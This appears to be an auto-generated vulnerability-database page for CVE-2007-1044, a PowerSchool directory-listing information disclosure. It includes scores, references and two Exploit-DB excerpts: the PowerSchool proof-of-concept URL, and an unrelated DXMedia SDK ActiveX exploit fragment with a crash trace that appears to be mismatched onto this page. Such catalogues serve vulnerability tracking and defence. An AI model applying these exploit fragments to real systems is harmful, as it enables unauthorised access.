CVE-2007-1044
Published 2007-02-21
Priority: P4, 30 | medium, 5 (CVSS 2.0)
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:P/I:N/A:N
EXPLOIT
EPSS: 8.54% (94.4th percentile)
Pearson Education PowerSchool 4.3.6 allows remote attackers to list the contents of the admin folder via a URI composed of the admin/ directory name and an arbitrary filename ending in ".js." NOTE: it was later reported that this issue had been addressed by 5.1.2.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pearson_education | powerschool | — | — |
No detection rules found.
Exploit-DB
Microsoft DXMedia SDK 6 - 'SourceUrl' ActiveX Remote Code Execution
exploitdb·2007-08-10
CVE-2007-4336 Microsoft DXMedia SDK 6 - 'SourceUrl' ActiveX Remote Code Execution
---
Tested on:..
- Microsoft DirectX Media 6.0 SDK
- Microsoft Internet Explorer 6 + all patches
- Microsoft Windows XP SP2 Polish + all patches
Details:..
obj.SourceUrl = "AAAA..1044..AAAA";
location.reload();
[Module DXTLIPI]
EAX 41414141
CALL DWORD PTR DS:[EAX]
Exploit-DB
Powerschool 4.3.6/5.1.2 - JavaScript File Request Information Disclosure
exploitdb·2007-02-19
CVE-2007-1044 Powerschool 4.3.6/5.1.2 - JavaScript File Request Information Disclosure
---
source: https://www.securityfocus.com/bid/22611/info
Powerschool is prone to an information-disclosure vulnerability because the application discloses information about administrative session variables.
An attacker can exploit this issue to obtain sensitive information that may aid in other attacks.
This issue affects Powerschool 4.3.6; other versions may also be affected.
UPDATE: Powerschool 5.1.2 is also reportedly affected by this issue, in a limited fashion.
http://www.example.com/admin/.js
No writeups or analysis indexed.
http://osvdb.org/33741
http://securityreason.com/securityalert/2276
http://www.securityfocus.com/archive/1/460533/100/0/threaded
http://www.securityfocus.com/archive/1/484569/100/200/threaded
http://www.securityfocus.com/bid/22611
https://exchange.xforce.ibmcloud.com/vulnerabilities/32569
Published: 2007-02-21